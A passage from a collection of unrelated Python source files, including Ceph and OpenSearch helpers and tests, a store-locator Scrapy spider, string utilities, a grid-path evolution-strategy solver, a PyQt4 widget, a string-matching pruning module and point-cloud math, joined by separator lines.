return self.cephRestApiUrl
def monsList(self):
cephRestApiUrl = self.getCephRestApiUrl()
stats = requests.get(cephRestApiUrl + 'status.json')
if stats.status_code != 200:
return Response(stats.raise_for_status())
stats = json.loads(stats.content)['output']
monmap = stats['monmap']['mons']
# print monmap
monHealth = stats['health']['health']['health_services'][0]['mons']
# print monHealth
mons = []
for m in monmap:
mon = {}
mon['name'] = m['name']
mon['rank'] = m['rank']
reip = re.compile(r'(?<![\.\d])(?:\d{1,3}\.){3}\d{1,3}(?![\.\d])')
mon['addr'] = reip.findall(m['addr'])[0]
for i in monHealth:
if m['name'] == i['name']:
mon['health'] = i['health']
if i.has_key('health_detail'):
mon['health_detail'] = i['health_detail']
mons.append(mon)
return Response(json.dumps(mons), mimetype='application/json')
|
from config import ElasticsearchConfig
import opensearchpy
import hashlib
import json
from storage import ElasticsearchStorage
class TestElasticsearchStorage:
def setup(self):
config = ElasticsearchConfig.create_from_env()
self._es_client = opensearchpy.OpenSearch(config.host)
self._es_store = ElasticsearchStorage(self._es_client)
self._index = "testindex"
def teardown(self):
self._es_client.indices.delete(index=self._index, ignore=[400, 404])
self._es_store = None
self._es_client = None
def test_store_changes(self):
d = {"foo": "bar"}
docs = [d]
self._es_store.store_changes(
index=self._index,
documents=docs,
id_fn=get_doc_id)
d = {"foobar": "barfoo"}
docs.append(d)
self._es_store.store_changes(
index=self._index,
documents=docs,
id_fn=get_doc_id)
# make sure the value is visible in the index
self._es_client.indices.refresh(index=self._index)
all_docs = self._es_client.search(index=self._index)
assert len(all_docs["hits"]["hits"]) == 2
# Insert again the same records, should not store anything new
self._es_store.store_changes(
index=self._index,
documents=docs,
id_fn=get_doc_checksum)
assert len(all_docs["hits"]["hits"]) == 2
def test_store_changes_with_id_fn(self):
docs = [{
"foo": "bar",
}]
self._es_store.store_changes(
index=self._index,
documents=docs,
id_fn=get_doc_checksum)
docs.append({"foo": "bar", "timestamp": "2021-03-01T00:00:00.000Z"})
self._es_store.store_changes(
index=self._index,
documents=docs,
id_fn=get_doc_checksum)
# make sure the value is visible in the index
self._es_client.indices.refresh(index=self._index)
all_docs = self._es_client.search(index=self._index)
assert len(all_docs["hits"]["hits"]) == 1
def test_store_changes_with_transform_document_fn(self):
def add_qux(x: dict) -> dict:
x["qux"] = "foobar"
return x
docs = [{
"foo": "bar",
}]
self._es_store.store_changes(
index=self._index,
documents=docs,
id_fn=get_doc_checksum,
transform_document_fn=add_qux
)
# make sure the value is visible in the index
self._es_client.indices.refresh(index=self._index)
all_docs = self._es_client.search(index=self._index)
assert len(all_docs["hits"]["hits"]) == 1
assert "qux" in all_docs["hits"]["hits"][0]["_source"]
assert all_docs["hits"]["hits"][0]["_source"]["qux"] == "foobar"
# still won't add a new document if we try without transform document fn
self._es_store.store_changes(
index=self._index,
documents=docs,
id_fn=get_doc_checksum
)
all_docs = self._es_client.search(index=self._index)
assert len(all_docs["hits"]["hits"]) == 1
def test_store_changes_filtered(self):
filter_by = {"term": {"cluster_id": "da932361-df0a-4bfa-8b4f-599bb2db5135"}}
docs = [{
"cluster_id": "da932361-df0a-4bfa-8b4f-599bb2db5135",
"foo": "bar",
}]
self._es_store.store_changes(
index=self._index,
documents=docs,
id_fn=get_doc_checksum,
filter_by=filter_by
)
docs.append({
"foo": "bar",
"cluster_id": "da932361-df0a-4bfa-8b4f-599bb2db5135",
"timestamp": "2021-03-01T00:00:00.000Z"
})
self._es_store.store_changes(
index=self._index,
documents=docs,
id_fn=get_doc_checksum,
filter_by=filter_by
)
# make sure the value is visible in the index
self._es_client.indices.refresh(index=self._index)
all_docs = self._es_client.search(index=self._index)
assert len(all_docs["hits"]["hits"]) == 1
def get_doc_id(doc: dict) -> str:
return hashlib.sha256(json.dumps(doc).encode('utf-8')).hexdigest()
def get_doc_checksum(doc: dict) -> str:
payload = doc
if "timestamp" in doc:
del payload["timestamp"]
return hashlib.sha256(json.dumps(payload, sort_keys=True).encode('utf-8')).hexdigest()
|
import re
import scrapy
import json
from locations.items import GeojsonPointItem
from locations.hours import OpeningHours
DAY_MAPPING = {
"monday": "Mo",
"tuesday": "Tu",
"wednesday": "We",
"thursday": "Th",
"friday": "Fr",
"saturday": "Sa",
"sunday": "Su",
}
class VitaliaSpider(scrapy.Spider):
name = "vitalia"
allowed_domains = ["www.vitalia-reformhaus.de"]
start_urls = ["https://www.vitalia-reformhaus.de/marktfinder"]
def parse_hours(self, store_hours):
opening_hours = OpeningHours()
if store_hours is None:
return
for store_day in store_hours:
opening_hours.add_range(
day=DAY_MAPPING[store_day],
open_time=f"{store_hours[store_day]['from']['hours']}:"
f"{store_hours[store_day]['from']['minutes']}",
close_time=f"{store_hours[store_day]['to']['hours']}:"
f"{store_hours[store_day]['to']['minutes']}",
time_format="%H:%M",
)
return opening_hours.as_opening_hours()
def parse(self, response):
match = re.search(r"jsonLocations: (.+),", response.text)
if match:
data = match.group(1)
stores = json.loads(data)
for store in stores["items"]:
properties = {
"ref": store["id"],
"name": store["name"],
"street": store["address"],
"city": store["city"],
"postcode": store["zip"],
"country": store["country"],
"lat": store["lat"],
"lon": store["lng"],
"phone": store["phone"],
"extras": {
"email": store["email"],
"website": store["website"],
"category": store["category"],
},
}
opening_hours = json.loads(store["schedule_string"])
hours = self.parse_hours(opening_hours)
if hours:
properties["opening_hours"] = hours
yield GeojsonPointItem(**properties)
|
"""Collection of common functions and other objects used throughout the program."""
import re
from typing import Any, Iterable, Union
def check_attributes(attrs_to_check: list = None, data: dict = None) -> Union[bool]:
"""Check to see if attributes specified in a list are contained within a dict.
:param attrs_to_check: List of attributes or keys to check the dict
:param data: The dict to check against for keys
"""
if not isinstance(attrs_to_check, list):
raise TypeError("Invalid data type, must use a list.")
if not isinstance(data, dict):
raise TypeError("Invalid data type, must use a dict.")
if all(key in data for key in attrs_to_check):
return True
return False
def cleanup_args(
args_dict: dict, items_to_remove: Iterable = ("self", "kwargs", "params")
) -> dict:
"""Iterate through dict and remove items."""
if not args_dict:
raise AttributeError("No arguments received.")
if not isinstance(args_dict, dict):
raise TypeError("Args must be passed as a dict.")
return {
k: v
for k, v in _unpack(args_dict)
if v is not None and k not in items_to_remove
}
def _unpack(data: Any) -> Any:
"""Unpack a dict."""
if isinstance(data, dict):
return data.items()
return data
def _copy_dict(data: dict) -> dict:
"""Copy a a dict."""
return data.copy()
def to_dict(obj: object) -> dict:
"""Convert an object's attributes to a dict."""
obj_dict = obj.__dict__
if "__values__" in obj_dict:
obj_dict = obj.__dict__.get("__values__")
return {k: v for k, v in _unpack(obj_dict)}
def to_snake_case(value: str) -> str:
"""Convert camel case string to snake case."""
words = re.findall(r"[A-Z]?[a-z]+|[A-Z]{2,}(?=[A-Z][a-z]|\d|\W|$)|\d+", value)
return "_".join(map(str.lower, words))
def keys_to_snake_case(content: dict) -> dict:
"""Convert all keys for given dict to snake case."""
return {to_snake_case(key): value for key, value in _unpack(content)}
def to_modified_camel(value: str) -> str:
"""Convert the given string to an underscore camel case."""
content = value.split("_")
return "_" + to_camel_case(value)
def to_camel_case(value: str) -> str:
"""Convert the given string to camel case."""
content = value.split("_")
return content[0] + "".join(
word.title() for word in content[1:] if not word.isspace()
)
def keys_to_camel_case(data: dict) -> dict:
"""Convert all keys for given dict to camel case."""
return {to_camel_case(key): value for key, value in _unpack(data)}
def keys_to_modified_camel(data: dict) -> dict:
"""Convert all keys for given dict to a modified camel case."""
return {to_modified_camel(key): value for key, value in _unpack(data)}
def parse_keys(data: dict = None, parse_type: str = "modified_camel") -> dict:
"""Convert all keys for given dict/list to snake case recursively.
:param data: The dict to parse
:param parse_type: The type of parsing to carry out.
The main types are `modified_camel`, `camel_case` and `snake_case`.
"""
if parse_type not in ("modified_camel", "camel_case", "snake_case"):
raise ValueError(
"Invalid parse type, use modified_camel, camel_case or snake_case"
)
if not isinstance(data, dict):
raise TypeError("Invalid data type, use dict.")
formatters = [keys_to_modified_camel, keys_to_camel_case, keys_to_snake_case]
formatter = None
for f in formatters:
if parse_type in f.__name__:
formatter = f
return formatter(data)
def pretty_attributes(
all_attributes: dict, desired_attributes: Iterable[str], max_attributes: int = 3
) -> str:
"""Return a pretty string for the __repr__ body of an object."""
pretty_str = ""
found_attributes = 0
for desired_attribute in desired_attributes:
if found_attributes >= max_attributes:
break
attribute_value = all_attributes.get(desired_attribute, None)
if attribute_value is not None:
found_attributes += 1
pretty_str += f"{desired_attribute}="
if isinstance(attribute_value, int):
pretty_str += f"{attribute_value}"
else:
pretty_str += f"'{attribute_value}'"
if not found_attributes >= max_attributes:
pretty_str += ", "
# Necessary when the API doesn't return the max number of desired attributes.
if pretty_str.endswith(", "):
pretty_str = pretty_str[:-2]
return pretty_str
def get_attributes(fields_to_iterate: list, attributes_to_fetch: list = None) -> list:
"""Iterate through list of dicts and return list of keys and values."""
if attributes_to_fetch:
attributes_to_fetch = [a.lower() for a in attributes_to_fetch]
attrs = []
for item in fields_to_iterate:
label = item["fieldName"].lower()
try:
value = item["fieldValue"]["value"]
except TypeError:
value = None
if attributes_to_fetch and label in attributes_to_fetch:
if isinstance(value, list) and len(value) == 1:
value = value[0]
key = to_snake_case(label)
attrs.append((key, value))
return attrs
def set_default_attr(obj: object, attr_name_to_set: str, value, default_value=None):
"""Set a default attr if it doesn't already exist."""
if not hasattr(obj, attr_name_to_set):
setattr(obj, attr_name_to_set, value or default_value)
|
#!/usr/bin/env python3
def __init__(hub):
global HUB
HUB = hub
class InvalidStructureError(OSError):
def __init__(self, msg):
self.hub = HUB
self.msg = msg
class CorruptedMetarepoError(KeyError):
def __init__(self, msg):
self.hub = HUB
self.msg = msg
class CorruptedKitError(ValueError):
def __init__(self, msg):
self.hub = HUB
self.msg = msg
class GitServiceError(ValueError):
def __init__(self, msg):
self.hub = HUB
self.msg = msg
class GitHubRepoURIError(GitServiceError):
def __init__(self, msg):
self.hub = HUB
self.msg = msg
class FuntooStashRepoURIError(GitServiceError):
def __init__(self, msg):
self.hub = HUB
self.msg = msg
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2021 The TARTRL Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pickle
import copy
import numpy as np
from gridworld.envs.gridworld.multiGoalSolver import SelectSolver
from gridworld.algorithms.ranking_cost.ES_model import ESModel
from gridworld.algorithms.ranking_cost.ES_engine import EvolutionStrategy
best_step = 50
class ESSolver(SelectSolver):
AGENT_HISTORY_LENGTH = 1
REWARD_SCALE = 20
SIGMA = 0.1
LEARNING_RATE = 0.01
def __init__(self, train_num, POPULATION_SIZE=20, print_step=1, action_type='VonNeumann_4', block_width=0,
train_rank=True, model_save_path=None, logger=None, saver=None):
super().__init__(action_type, block_width)
self.train_num = train_num
self.POPULATION_SIZE = POPULATION_SIZE
self.print_step = print_step
self.train_rank = train_rank
self.model_save_path = model_save_path if model_save_path else './model.pkl'
self.logger = logger
self.saver = saver
self.es = EvolutionStrategy(self.get_reward, self.log_function, self.stop_function,
self.saver,
self.POPULATION_SIZE, self.SIGMA,
self.LEARNING_RATE)
def _solve(self, maze_data, starts, goals):
assert len(starts) == len(goals)
sg_pairs = list(zip(starts, goals))
start_num = len(sg_pairs)
self.mini_cost = 1e6
self.max_cost = np.prod(maze_data.shape)
self.best_solution = None
self.best_traces = None
self.best_reward = -1e6
self.best_reward_step = 0
self.model = ESModel(pair_num=start_num, maze_shape=maze_data.shape)
self.es.reset()
self.es.set_weights(self.model.get_weights())
self.maze_data = maze_data
self.sg_pairs = sg_pairs
self.es.run(iterations=self.train_num)
if self.saver:
print('save final model!')
self.saver.save(self.es.get_weights())
def close(self):
self.es.close()
def log_function(self, iteration, weights, reward, rewards, time_duration):
if self.logger:
self.logger.update_data({'reward': reward,
'rewards': rewards,
'time': time_duration,
'step': iteration})
self.logger.display_info()
self.logger.plot_figure()
self.logger.save_solution(self)
def stop_function(self, iteration, weights, reward, rewards, time_duration):
if self.best_reward > reward:
self.best_reward = reward
self.best_reward_step = iteration
return False
if self.best_reward <= reward and (iteration - self.best_reward_step) >= best_step:
return True
return False
def get_reward(self, weights):
cost_now, traces_now, solution_rank = self.get_solution(weights)
if cost_now is None or cost_now >= self.max_cost:
cost_now = self.max_cost
cost_now = cost_now / self.max_cost
reward_now = -cost_now
return reward_now * self.REWARD_SCALE
def get_solution(self, weights):
self.model.set_weights(weights)
solution_rank, maze_weights = self.get_maze_weights()
cost_now, traces_now = self.planOnSolution(solution_rank, maze_weights, self.maze_data, self.sg_pairs)
self.cost_now = cost_now
self.traces_now = traces_now
self.solution_now = solution_rank
return cost_now, traces_now, solution_rank
def get_maze_weights(self):
prediction = self.model.get_rank_prob()
if self.train_rank:
solution_rank = np.argsort(prediction)[::-1]
else:
solution_rank = range(len(prediction))
maze_now = copy.copy(self.model.get_maze_data())
maze_now = maze_now[solution_rank]
return solution_rank, maze_now
def planOnSolution(self, rank_now, maze_weights, maze_data, sg_pairs):
rank_now = list(rank_now)
cost_all = 0
new_maze_data = copy.copy(maze_data)
new_sg_pairs = []
for i in rank_now:
new_sg_pairs.append(sg_pairs[i])
traces = []
for i, sg_pair in enumerate(new_sg_pairs):
block_poses = []
if i < len(new_sg_pairs) - 1:
for b in new_sg_pairs[i + 1:]:
for bb in b:
block_poses.append(bb)
if self.block_width > 0:
for key in self.transitions:
bb_neighbour = [bb[0] + self.transitions[key][0], bb[1] + self.transitions[key][1]]
block_poses.append(bb_neighbour)
if i == len(new_sg_pairs) - 1:
extra_cost = None
else:
extra_cost = np.sum(maze_weights[i + 1:], axis=0)
cost, trace_now = self.planOnOneStart(new_maze_data, sg_pair, block_poses, extra_cost=extra_cost)
if cost is None:
return None, None
traces.append(trace_now)
cost_all += cost
return cost_all, traces
def load(self, filename='weights.pkl'):
with open(filename, 'rb') as fp:
self.model.set_weights(pickle.load(fp))
self.es.weights = self.model.get_weights()
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'StockPosition.ui'
#
# Created by: PyQt4 UI code generator 4.11.4
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_DockWidget(object):
def setupUi(self, DockWidget):
DockWidget.setObjectName(_fromUtf8("DockWidget"))
DockWidget.resize(860, 65)
self.dockWidgetContents = QtGui.QWidget()
self.dockWidgetContents.setObjectName(_fromUtf8("dockWidgetContents"))
self.verticalLayout = QtGui.QVBoxLayout(self.dockWidgetContents)
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.horizontalLayout = QtGui.QHBoxLayout()
self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
self.cb_no_zero_position = QtGui.QCheckBox(self.dockWidgetContents)
self.cb_no_zero_position.setObjectName(_fromUtf8("cb_no_zero_position"))
self.horizontalLayout.addWidget(self.cb_no_zero_position)
self.cb_only_etf_fund = QtGui.QCheckBox(self.dockWidgetContents)
self.cb_only_etf_fund.setObjectName(_fromUtf8("cb_only_etf_fund"))
self.horizontalLayout.addWidget(self.cb_only_etf_fund)
self.rb_code = QtGui.QRadioButton(self.dockWidgetContents)
self.rb_code.setChecked(True)
self.rb_code.setObjectName(_fromUtf8("rb_code"))
self.horizontalLayout.addWidget(self.rb_code)
self.le_code_data = QtGui.QLineEdit(self.dockWidgetContents)
self.le_code_data.setObjectName(_fromUtf8("le_code_data"))
self.horizontalLayout.addWidget(self.le_code_data)
spacerItem = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Maximum, QtGui.QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem)
self.pb_search = QtGui.QPushButton(self.dockWidgetContents)
self.pb_search.setObjectName(_fromUtf8("pb_search"))
self.horizontalLayout.addWidget(self.pb_search)
self.pb_export = QtGui.QPushButton(self.dockWidgetContents)
self.pb_export.setObjectName(_fromUtf8("pb_export"))
self.horizontalLayout.addWidget(self.pb_export)
spacerItem1 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem1)
self.verticalLayout.addLayout(self.horizontalLayout)
DockWidget.setWidget(self.dockWidgetContents)
self.retranslateUi(DockWidget)
QtCore.QMetaObject.connectSlotsByName(DockWidget)
def retranslateUi(self, DockWidget):
DockWidget.setWindowTitle(_translate("DockWidget", "现货持仓", None))
self.cb_no_zero_position.setText(_translate("DockWidget", "不显示0持仓", None))
self.cb_only_etf_fund.setText(_translate("DockWidget", "只显示ETF和基金", None))
self.rb_code.setText(_translate("DockWidget", "证券代码筛选", None))
self.pb_search.setText(_translate("DockWidget", "查询", None))
self.pb_export.setText(_translate("DockWidget", "导出", None))
|
from ipywidgets import DOMWidget
from traitlets import Unicode, Int, Bool
from ._version import EXTENSION_SPEC_VERSION
module_name = "jupyter-plot-utils"
class SimpleShape(DOMWidget):
_model_name = Unicode('SimpleShapeModel').tag(sync=True)
_model_module = Unicode(module_name).tag(sync=True)
_model_module_version = Unicode(EXTENSION_SPEC_VERSION).tag(sync=True)
_view_name = Unicode('SimpleShapeView').tag(sync=True)
_view_module = Unicode(module_name).tag(sync=True)
_view_module_version = Unicode(EXTENSION_SPEC_VERSION).tag(sync=True)
rotate = Bool(False).tag(sync=True)
|
"""
Pruning module.
Classes:
- NoPruning
- LazyCountPruning
- BucketCountPruning
- BatchCountPruning
"""
import math
import logging
logger = logging.getLogger(__name__)
class NoPruning:
"""No Pruning class.
Does not perform any pruning.
"""
@classmethod
def filter(cls,
Pe: list,
Le: int,
Te: int,
*args
) -> None:
"""Does not perform any pruning.
Parameters
----------
Pe : list
Sorted position list.
Le : int
Lower bound of |s| = |G(s)| (number of s's q-grams).
Te : int
Upper bound of |s| = |G(s)| (number of s's q-grams).
args :
More arguments.
Yields
-------
Count spans: start (i) and end (j) indexes in position list (Pe).
"""
for i in range(1, len(Pe)+1):
for j in range(i+1, len(Pe)+1):
yield i, j
return
class LazyCountPruning:
"""Lazy-Count Pruning class.
Performs Lazy-Count Pruning:
- Condition: |Pe| < Tl <= T (Lemma 3)
"""
@classmethod
def filter(cls,
Pe: list,
Le: int,
Te: int,
Tl: int,
*args
) -> None:
"""Searches invalid windows using Lazy-Count Pruning.
1. Count e's occurrence number (len(Pe)).
2. If occurrence number < Tl, then the entity is pruned.
Parameters
----------
Pe : list
Sorted position list.
Le : int
Lower bound of |s| = |G(s)| (number of s's q-grams).
Te : int
Upper bound of |s| = |G(s)| (number of s's q-grams).
Tl : int
Lower bound of shared tokens between e and s (lazy-count bound).
args:
More arguments.
Yields
-------
Start and end position of invalid (removable) window.
"""
if len(Pe) >= Tl:
yield from NoPruning.filter(Pe, Le, Te)
class BucketCountPruning:
"""Bucket-Count Pruning class.
Performs Bucket-Count Pruning:
- 1. Perform Lazy-Count Pruning
- 2.
"""
@classmethod
def filter(cls,
Pe: list,
Le: int,
Te: int,
Tl: int,
tighter_bound_func,
*bound_args
) -> None:
"""Searches count spans using Bucket Count Pruning.
TODO: No partitioning? --> size(bucket) < Tl, then prune elements in bucket
TODO: Check condition? --> (j - i + 1 >= Tl)
TODO:
Parameters
----------
Pe : list
Sorted position list.
Le : int
Lower bound of |s| = |G(s)| (number of s's q-grams).
Te : int
Upper bound of |s| = |G(s)| (number of s's q-grams).
Tl : int
Lower bound of shared tokens between e and s (lazy-count bound)
tighter_bound_func :
Tighter bound function for edit distance and edit similarity.
bound_args :
Tighter bound function arguments.
Yields
-------
Start (i) and end (j) indexes of sublists of Pe.
"""
# lazy-count pruning: |Pe| < Tl <= T (Lemma 3)
# TODO: why condition for 'No Pruning' ?
if len(Pe) >= Tl:
try:
Te_diff_Tl = tighter_bound_func(*bound_args)
# tighter bound is not supported for jaccard, cosine and dice -- uses Te - Tl
except Exception:
Te_diff_Tl = Te - Tl
# partitioning
for i, j in cls.iter_bucket_spans(Pe, Te_diff_Tl):
# Check length of bucket
# TODO: Reuse existing class: yield from LazyCountPruning.filter(Pe[i:j], Le, Te, Tl)
if j - i + 1 >= Tl:
yield i, j
@classmethod
def iter_bucket_spans(cls,
Pe: list,
t: int
):
"""Iterate over position list (Pe).
1. Loop over position list (Pe)
a. Get neighbour positions pi, pj
b.
c. Move to next neighbours
If p_(i+1) - p_i - 1 > t, create new partition.
Threshold t may vary for different similarity functions.
TODO: Check condition? --> (pj - pi + 1 > t) --> (pj - pi - 1 > t)
Parameters
----------
Pe : list
Sorted position list.
t : int
Threshold for partitioning.
Yields
-------
Start and end position of current bucket window.
"""
# neighbour indexes
i, j = 1, 2
# bucket indexes (Pe[k;l])
k = i
l = i
while True:
try:
# get elements
pi, pj = Pe[i-1], Pe[j-1]
# check for end of position list
except IndexError:
# last position
l = i
# return bucket indexes
yield k, l
# end
break
else:
# TODO: Check paper for correct formulae
# condition for new bucket
if pj - pi + 1 > t:
# last position
l = i
yield k, l
# create new bucket
k = j
# move span by 1
i += 1
j += 1
class BatchCountPruning:
"""Batch-Count Pruning class.
Performs Batch-Count pruning:
- Condition:
"""
@classmethod
def filter(cls,
Pe: list,
Le: int,
Te: int,
Tl: int,
tighter_bound_func,
*bound_args
) -> None:
"""Searches invalid window using Batch-Count Pruning.
Parameters
----------
Pe : list
Sorted position list.
Le : int
Lower bound of |s| = |G(s)| (number of s's q-grams).
Te : int
Upper bound of |s| = |G(s)| (number of s's q-grams).
Tl : int
Lower bound of shared tokens between e and s (lazy-count bound).
tighter_bound_func :
Tighter bound function for edit distance and edit similarity.
bound_args :
Tighter bound function arguments.
Returns
-------
Start and end position of the candidate window.
"""
# lazy-count pruning: |Pe| <= Tl < T (Lemma 3)
if len(Pe) >= Tl:
# find possible candidate windows using ``binary_span`` and ``binary_shift``
for i, j in cls.iter_possible_candidate_windows(Pe, Te, Tl):
try:
# |e|, |Pe[i. . .j]|, t
tighter_Te = tighter_bound_func(bound_args[0], j-i+1, bound_args[1])
except Exception as e:
logger.info(e)
# tighter bound is not supported for edit distance and similarity -- uses Te
tighter_Te = Te
# check if possible candidate window is an actual candidate window
if cls.check_possible_candidate_window(i, j, Pe, Le, Te, Tl, tighter_Te):
# return the span for counting
yield i, j
@classmethod
def check_possible_candidate_window(cls,
i: int,
j: int,
Pe: list,
Le: int,
Te: int,
Tl: int,
tighter_Te: int = None
) -> bool:
"""Checks whether a window is a ``possible candidate window''.
Parameters
----------
i : int
Window start position.
j : int
Window end position.
Pe : list
Sorted position list.
Le : int
Lower bound of |s| = |G(s)| (number of s's q-grams).
Te : int
Upper bound of |s| = |G(s)| (number of s's q-grams).
Tl : int
Lower bound of shared tokens between e and s (lazy-count bound).
tighter_Te : int
Even tighter upper bound Te.
Returns
-------
True, if window is ``possible candidate window''.
"""
# (j-1)+1 = j (-1 due to 0-based indexing and +1 because python list is non-inclusive)
Pe_ij = Pe[i-1:j]
# this is redundant to check because it is made sure by ``find_possible_candidate_spans``
# valid window: make sure that we have a valid window (cf. Definition 3, condition 1)
if Tl <= len(Pe_ij) <= Te:
pi = Pe[i-1]
pj = Pe[j-1]
if tighter_Te is None:
tighter_Te = Te
# candidate window: make sure we have a candidate window (cf. Definition 3, condition 2)
if Le <= pj - pi + 1 <= tighter_Te:
return True
return False
@classmethod
def iter_possible_candidate_windows(cls,
Pe: list,
Te: int,
Tl: int
):
"""TODO: Documentation
Parameters
----------
Pe : list
Sorted position list.
Te : int
Upper bound of |s| = |G(s)| (number of s's q-grams).
Tl : int
Lower bound of shared tokens between e and s (lazy-count bound).
Yields
-------
TODO: Documentation
"""
i = 1
while i <= len(Pe) - Tl + 1:
# pg. 535 left column, last line (initially Pe[1,..,Tl])
j = i + Tl - 1
# 0 based indexing; add -1
pj, pi = Pe[j-1], Pe[i-1]
# length for substring |D[pi...pj]| = pj-pi+1 is not larger than upper bound
if (pj - pi + 1) <= Te:
# we have a valid substring with size, Tl ≤ |Pe[i · · · j]| ≤ Te
# Hence, find candidate window ⊥e ≤ |D[pi · · · pj]| ≤ Te
mid = cls.binary_span(i, j, Pe, Te)
yield i, mid
i += 1
else:
# candidate windows are too long
i = cls.binary_shift(i, j, Pe, Te, Tl)
@classmethod
def binary_shift(cls,
i: int,
j: int,
Pe: list,
Te: int,
Tl: int
):
"""Performs binary shift on position list Pe.
Parameters
----------
i : int
Window start position.
j : int
Window end position.
Pe : list
Sorted position list.
Te : int
Upper bound of |s| = |G(s)| (number of s's q-grams).
Tl : int
Lower bound of shared tokens between e and s (lazy-count bound).
Returns
-------
Lower bound of shifted window.
"""
lower = i
upper = j
while lower <= upper:
mid = math.ceil((lower + upper) / 2)
pmid, pj = Pe[mid-1], Pe[j-1]
if ((pj + (mid - i)) - pmid + 1) > Te:
lower = mid + 1
else:
upper = mid - 1
i = lower
j = i + Tl - 1
# if j jumps over, clip it to the length of position list
if j > len(Pe):
j = len(Pe)
pi, pj = Pe[i-1], Pe[j-1]
if (pj - pi + 1) > Te:
# TODO: Recursion Error
i = cls.binary_shift(i, j, Pe, Te, Tl)
return i
@classmethod
def binary_span(cls,
i: int,
j: int,
Pe: list,
Te: int
) -> int:
"""Performs binary span on position list Pe.
Parameters
----------
i : int
Window start position.
j : int
Window end position.
Pe : list
Sorted position list.
Te : int
Upper bound of |s| = |G(s)| (number of s's q-grams).
Returns
-------
Returns the new right span, which is the medium of lower and upper.
"""
lower = j
upper = i + Te - 1
while lower <= upper:
# mid is new right span, eventually larger than j (i.e. lower)
# if mid jumps out of len(Pe) then it will raise IndexError!
mid = int(math.ceil((upper + lower)/2))
if mid <= len(Pe):
pmid, pi = Pe[mid-1], Pe[i-1]
if pmid - pi + 1 > Te:
upper = mid - 1
else:
lower = mid + 1
# this is heuristic based, if mid exceeds the length, we decrement it;
# without this condition we miss many candidate windows e.g. 'surauijt ch'
# in Table 1 document for entity 'surajit ch'
else:
upper = mid - 1
mid = upper
return mid
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import os
import argparse
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import numpy as np
from scipy.spatial.transform import Rotation
# Part of the code is referred from: https://github.com/ClementPinard/SfmLearner-Pytorch/blob/master/inverse_warp.py
def quat2mat(quat):
x, y, z, w = quat[:, 0], quat[:, 1], quat[:, 2], quat[:, 3]
B = quat.size(0)
w2, x2, y2, z2 = w.pow(2), x.pow(2), y.pow(2), z.pow(2)
wx, wy, wz = w*x, w*y, w*z
xy, xz, yz = x*y, x*z, y*z
rotMat = torch.stack([w2 + x2 - y2 - z2, 2*xy - 2*wz, 2*wy + 2*xz,
2*wz + 2*xy, w2 - x2 + y2 - z2, 2*yz - 2*wx,
2*xz - 2*wy, 2*wx + 2*yz, w2 - x2 - y2 + z2], dim=1).reshape(B, 3, 3)
return rotMat
def transform_point_cloud(point_cloud, rotation, translation):
if len(rotation.size()) == 2:
rot_mat = quat2mat(rotation)
else:
rot_mat = rotation
return torch.matmul(rot_mat, point_cloud) + translation.unsqueeze(2)
def npmat2euler(mats, seq='zyx'):
eulers = []
# for i in range(mats.shape[0]):
for i in range(len(mats)):
r = Rotation.from_dcm(mats[i])
eulers.append(r.as_euler(seq, degrees=True))
return np.asarray(eulers, dtype='float32')
def error_euler_angles(mat_pred,eulers_gt, seq='zyx'):
mat_diff = []
for i in range(mat_pred.shape[0]):
r_pred = mat_pred[i]
r_gt = Rotation.from_euler(seq,eulers_gt[i],degrees=True).as_dcm()
mat_diff.append(r_pred.dot(r_gt.T))
return npmat2euler(mat_diff) |
from __future__ import annotations
import game.entity
from game.components.base_component import BaseComponent
class Fighter(BaseComponent):
def __init__(self, hp: int, base_defense: int, base_power: int):
super().__init__()
self.max_hp = hp
self.hp = hp
self.base_defense = base_defense
self.base_power = base_power
@property
def defense(self) -> int:
return self.base_defense + self.defense_bonus
@property
def power(self) -> int:
return self.base_power + self.power_bonus
@property
def defense_bonus(self) -> int:
actor = self.get_parent(game.entity.Actor)
if actor.equipment:
return actor.equipment.defense_bonus
else:
return 0
@property
def power_bonus(self) -> int:
actor = self.get_parent(game.entity.Actor)
if actor.equipment:
return actor.equipment.power_bonus
else:
return 0
|
import unittest
import tests.command_download
class DownloadTophTest(unittest.TestCase):
def snippet_call_download(self, *args, **kwargs):
tests.command_download.snippet_call_download(self, *args, **kwargs)
def test_call_download_toph_new_year_couple(self):
self.snippet_call_download('https://toph.co/p/new-year-couple', {
'sample-2.out': 'a147d4af6796629a62fa43341f0e0bdf',
'sample-2.in': 'fc1dbb7bb49bfbb37e7afe9a64d2f89b',
'sample-1.in': 'd823c94a5bbd1af3161ad8eb4e48654e',
'sample-1.out': '0f051fce168dc5aa9e45605992cd63c5',
})
def test_call_download_toph_power_and_mod(self):
self.snippet_call_download('https://toph.co/p/power-and-mod', {
'sample-1.in': '46e186317c8c10d9452d6070f6c63b09',
'sample-1.out': 'ad938662144b559bff344ff266f9d1cc',
})
|
from ..common.constants import MODEL_DEEPGO, MODEL_DEEPRED, MODEL_GOLABELER, MODEL_XBERT, MODEL_PROTBERT
from .DeepGoPostProcess import DeepGoPostProcess
from .PostProcess import PostProcess
from pathlib import Path
import pandas as pd
import logging
logger = logging.getLogger(__name__)
def get_deepgo_postproces() -> PostProcess:
